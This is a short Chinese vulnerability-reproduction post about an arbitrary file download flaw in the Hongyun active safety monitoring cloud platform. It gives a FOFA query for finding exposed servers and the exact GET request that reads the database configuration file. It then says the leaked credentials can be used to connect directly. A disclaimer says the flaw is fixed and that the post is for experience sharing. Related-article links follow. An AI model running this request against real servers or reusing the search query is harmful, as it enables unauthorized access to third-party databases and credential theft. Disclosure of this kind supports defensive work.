漏洞复现--鸿运主动安全监控云平台任意文件下载

免责声明:

**文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行

**

一:漏洞描述

深圳市强鸿电子有限公司鸿运主动安全监控云平台存在任意文件下载漏洞,攻击者可通过此漏洞获得登录账号密码,以进行后续测试。

二:漏洞影响版本

鸿运主动安全监控云平台

三:网络空间测绘查询

fofa:
body="./open/webApi.html"

四:漏洞复现

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties

五:漏洞利用

读取到数据库账号密码,直接连接

相关推荐
Whoami!20 分钟前
❼⁄₁ ⟦ OSCP ⬖ 研记 ⟧ 查找漏洞的公共利用 ➱ 在线资源
网络安全·信息安全·漏洞利用
漏洞文库-Web安全3 小时前
【CTF】关于md5总结
安全·web安全·网络安全·ctf·md5
聊天QQ:276998853 小时前
基于51单片机的汽车灯光模拟仿真之旅
网络安全
漏洞文库-Web安全4 小时前
【CTF】buuctf web 详解(持续更新)
安全·web安全·网络安全·ctf·buuctf
cdprinter13 小时前
信刻物理隔离网络安全光盘摆渡一体机
安全·自动化
空白诗16 小时前
mdcat 在 HarmonyOS 上的构建与适配
后端·安全·华为·rust·harmonyos
红树林0717 小时前
渗透测试之sql注入--报错注入
数据库·sql·安全·web安全
Xudde.18 小时前
Quick2靶机渗透
笔记·学习·安全·web安全·php
岁岁的O泡奶18 小时前
DVWA_Vulnerability: Command Injection
经验分享·安全·web安全
羑悻的小杀马特19 小时前
轻量跨云·掌控无界:Portainer CE + cpolar 让远程容器运维像点外卖一样简单——免复杂配置,安全直达对应集群
运维·网络·安全·docker·cpolar